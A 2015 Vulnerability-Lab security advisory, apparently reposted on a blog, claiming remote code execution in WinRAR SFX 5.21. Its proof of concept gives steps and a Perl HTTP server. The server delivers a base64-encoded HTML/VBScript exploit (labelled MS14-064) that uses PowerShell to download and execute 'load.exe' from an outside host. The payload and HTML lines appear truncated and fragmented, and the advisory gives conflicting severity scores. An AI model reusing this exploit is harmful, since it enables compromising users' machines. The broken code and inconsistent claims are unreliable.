Document Title:
===============
WinRAR SFX v5.21 - Remote Code Execution Vulnerability
References (Source):
====================
http://www.vulnerability-lab.
Video: https://www.youtube.com/watch?
Release Date:
=============
2015-09-28
Vulnerability Laboratory ID (VL-ID):
==============================
1608
Common Vulnerability Scoring System:
==============================
9
Product & Service Introduction:
==============================
WinRAR with over 500 million users worldwide by far the most popular compression program and therefore the best way to files securely and
efficiently to pack for a data transfer to speed up the data transfer via e-mail and secure storage optimized files.
(Copy of the Homepage: http://www.win-rar.com/start.
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered a code execution vulnerability in the official WInRAR SFX v5.21 software.
Vulnerability Disclosure Timeline:
==============================
2015-09-28: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Critical
Technical Details & Description:
==============================
A remote code execution vulnerability has been discovered in the official WInRAR SFX v5.21 software.
The vulnerability allows remote attackers to unauthorized execute system specific code to comrpomise a target system.
The issue is located in the `Text and Icon` function of the `Text to display in SFX window` module. Remote attackers are
able to generate own compressed archives with maliciuous payloads to execute system specific codes for compromise. The attackers
saved in the sfx archive input the malicious generated html code. Thus results in a system specific code execution when a target
user or system is processing to open the comprossed archive.
The security risk of the code execution vulnerability is estimated as critical with a cvss (common vulnerability scoring system) count of 9.2.
Exploitation of the code execution vulnerability requires low user interaction (open file) without privilege system or restricted user accounts.
Successful exploitation of the remote code execution vulnerability in the WinRAR SFX software results in system, network or device compromise.
Proof of Concept (PoC):
=======================
The code execution vulnerability can be exploited by remote attackers without privilege system user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Run perl code : perl poc.pl
2. Right Click on any file and select "add to archive..."
3. Select "Create SFX archive"
4. Go to the Advanced Menu and select "SFX options..."
5. Go to the "Text and icon" Menu
6. Copy this perl output (HTML) and past on "Text to display in SFX window"
7. Click OK -- OK
8. Your SFX file Created
9. Just open sfx file
10. Your Link Download/Execute on your target
11. Successful reproduce of the code execution vulnerability!
PoC: Exploit Code
#!/usr/bin/perl
# Title : WinRaR SFX - Remote Code Execution
# Affected Versions: All Version
# Tested on Windows 7 / Server 2008
#
# Author: Mohammad Reza Espargham
# Linkedin: https://ir.linkedin.com/in/
# E-Mail: me[at]reza[dot]es , reza.espargham[at]gmail[dot]
# Website: www.reza.es
# Twitter: https://twitter.com/rezesp
# FaceBook: https://www.facebook.com/reza.
#
# ID: MS14-064
use strict;
use warnings;
use IO::Socket;
use MIME::Base64 qw( decode_base64 );
use Socket 'inet_ntoa';
use Sys::Hostname 'hostname';
print " Mohammad Reza Espargham\n\n";
my $ip = inet_ntoa(scalar gethostbyname(hostname() || 'localhost'));
my $port = 80;
print "Winrar HTML Code\n".'<html><head><title>
print "Winrar HTML Code\n".'<html><head><title>
my $server = new IO::Socket::INET( Proto => 'tcp',
LocalPort => $port,
Listen => SOMAXCONN,
ReuseAddr => 1)
or die "Unable to create server socket";
# Server loop
while(my $client = $server->accept())
{
my $client_info;
while(<$client>)
{
last if /^\r\n$/;
$client_info .= $_;
}
incoming($client, $client_info);
}
sub incoming
{
print "\n=== Incoming Request:\n";
my $client = shift;
print $client &buildResponse($client, shift);
close($client);
}
sub buildResponse
{
my $client = shift;
my $client_info = shift;
my $poc="
dWxhdGVJRTgiID4KPGhlYWQ+
Y3JpcHQiPgoKZnVuY3Rpb24gcnVubX
ZWxsPWNyZWF0ZW9iamVjdCgiU2hlbG
cmVzc2lvbiAkKE5ldy1PYmplY3QgU3
aHR0cDovL3RoZS5lYXJ0aC5saS9+
LCdsb2FkLmV4ZScpOyQoTmV3LU9iam
ZWN1dGUoJ2xvYWQuZXhlJyk7IgpzaG
Ii1Db21tYW5kICIgJiBjb21tYW5kLC
cHQ+
KCkKZGltICAgYTAKZGltICAgYTEKZG
aW50VmVyc2lvbgpkaW0gICBybmRhCm
bigpCiAKZnVuY3Rpb24gQmVnaW4oKQ
Z2F0b3IuVXNlckFnZW50CiAKICBpZi
IGV4aXQgICBmdW5jdGlvbgogIGVuZC
IHRoZW4gCiAgICAgICAgICAgICBpbn
bywgIk1TSUUiKSArIDUsIDIpKSAgIA
ICAgICAgICAgIAogIGVuZCBpZgogCi
dGUoKT1UcnVlIFRoZW4KICAgICBteW
aHJ3KDAxKSZjaHJ3KDAwKSZjaHJ3KD
IG15YXJyYXk9bXlhcnJheSZjaHJ3KD
ICAgICBpZihpbnRWZXJzaW9uPDQpIH
SUUiKQogICAgICAgICBkb2N1bWVudC
bGNvZGUoKSAgICAgICAgICAgICAgIC
YWZlbW9kZSgpCiAgICAgZW5kIGlmCi
Z2luSW5pdCgpCiAgIFJhbmRvbWl6ZS
IGEwPTEzKzE3KnJuZCg2KQogICBhMz
IENyZWF0ZSgpCiAgT24gRXJyb3IgUm
IEZvciBpID0gMCBUbyA0MDAKICAgIE
cnVlCiAgICAgICBFeGl0IEZvcgogIC
IHRlc3RhYSgpCmVuZCBzdWIKIApmdW
IE5leHQKICAgICBpPXRlc3RhYQogIC
MikgIAogICAKICAgICBhYigwKT0wCi
NDM3ODAxRS0zMTQKIAogICAgIGFhKG
NzMxMzI0RS0zMTAgIAogICAgIG15ZG
YTApICAKZW5kIGZ1bmN0aW9uIAogCi
RXJyb3IgUmVzdW1lIE5leHQKICAgIG
dW0oaSsxNikKICAgIGo9cnVtKGkrJm
ICAgICAgICBqPXJ1bShpKyZoMTIwK2
ICAgIGo9MCAgICAgICAgICAKICAgIC
ICAgICAgICAgIAogICAgIGFhKGExKz
ZWRpbSAgUHJlc2VydmUgYWEoYTApIC
KyZoMTIwK2spICAgCiAgICAgICAgIC
ICBlbmQgaWYKIAogICAgbmV4dCAKIC
cnVubXVtYWEoKSAKZW5kIGZ1bmN0aW
ZXN1bWUgTmV4dAogICAgZGltIHR5cG
MD1hMCthMwogICAgYTE9YTArMgogIC
ZXNlcnZlIGFhKGEwKSAKICAgIHJlZG
c2VydmUgYWEoYTIpCiAgIAogICAgdH
Nzg5MDEyMzQ1Njc4OTAKICAgIGFhKG
YWEoYTEtMSkpID0gRmFsc2UpIFRoZW
ICAgICAgIG1lbT1jaW50KGEwKzEpKj
ZShhYShhMS0xKSkKICAgICAgICAgIC
ICAgICAgICAgICAgICBpZih2YXJ0eX
ICAgICAgICAgSWYoSXNPYmplY3QoYW
ICAgICAgICAgICAgICAgICAgIHR5cG
IGVuZCBpZiAgICAgICAgICAgICAgIA
c2UKICAgICAgICAgICAgIHJlZGltIC
IGZ1bmN0aW9uCiAKICAgICAgICAgIC
KHZhcnR5cGUoYWEoYTEtMSkpPD4wKS
dChhYShhMSkpID0gRmFsc2UgKSBUaG
YWEoYTEpKQogICAgICAgICAgICAgIG
bmQgaWYKICAgICAgICBlbmQgaWYKIC
IElmKHR5cGUxPSZoMmY2NikgVGhlbi
CiAgICBFbmQgSWYgIAogICAgSWYodH
dWUKICAgICAgICAgIHdpbjl4PTEKIC
YShhMCkgICAgICAgICAgCiAgICAgIC
KSAKICAgIE9uIEVycm9yIFJlc3VtZS
ICAgCiAgICBhYigwKT0wICAgCiAgIC
OTY2MzMxNjc0N0UtMzEzICAgICAgIA
KDApPTAKICAgIHJlZGltICBQcmVzZX
CiAKPC9ib2R5Pgo8L2h0bWw+";
$poc = decode_base64($poc);
my $r = "HTTP/1.0 200 OK\r\nContent-type: text/html\r\n\r\n
$poc";
return $r;
}
Security Risk:
==============
The security risk of the code execution vulnerability in the winrar sfx software is estimated as high. (CVSS 7.4)
Credits & Authors:
==================
Mohammad Reza Espargham [https://ir.linkedin.com/in/
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/
Feeds: vulnerability-lab.com/rss/rss.
Programs: vulnerability-lab.com/submit.
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
Komentarų nėra:
Rašyti komentarą